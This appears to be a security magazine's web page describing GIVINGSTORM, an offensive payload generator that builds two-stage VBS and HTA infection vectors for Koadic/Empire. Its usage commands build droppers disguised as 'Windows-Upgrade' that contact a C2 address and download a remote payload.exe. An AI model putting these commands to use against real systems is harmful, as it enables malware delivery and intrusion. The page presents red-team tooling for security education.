The beginnings of a C2 framework. Currently without all the C2 stuff so far. Generates a dual-stage VBS infection vector, and a dual-stage HTA infection vector. The variables take into account C2 addresses, Koadic/Empire payloads, and a few delivery mechanisms. The payload files are output to an aptly named directory "Payloads" that is created if not already present.
Installation & Usage
GIVINGSTORM is a breeze to use. Simply clone the directory, and cd into it.
For the HTA payload: python3 GIVINGSTORM.py -n Windows-Upgrade -p b64encodedpayload -c amazon.com/c2/domain
For the Macro Subroutine: python3 GIVINGSTORM.py -n Windows-Upgrade -e amazon.com/final/payload.exe
- Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
- Blog2022.12.13What are the Common Security Weaknesses of Cloud Based Networks?
- Blog2022.10.12Vulnerability management with Wazuh open source XDR
- Blog2022.08.29Deception Technologies: Improving Incident Detection and Response by Alex Vakulov
- Blog2022.08.25Exploring the Heightened Importance of Cybersecurity in Mobile App Development by Jeff Kalwerisky
View all comments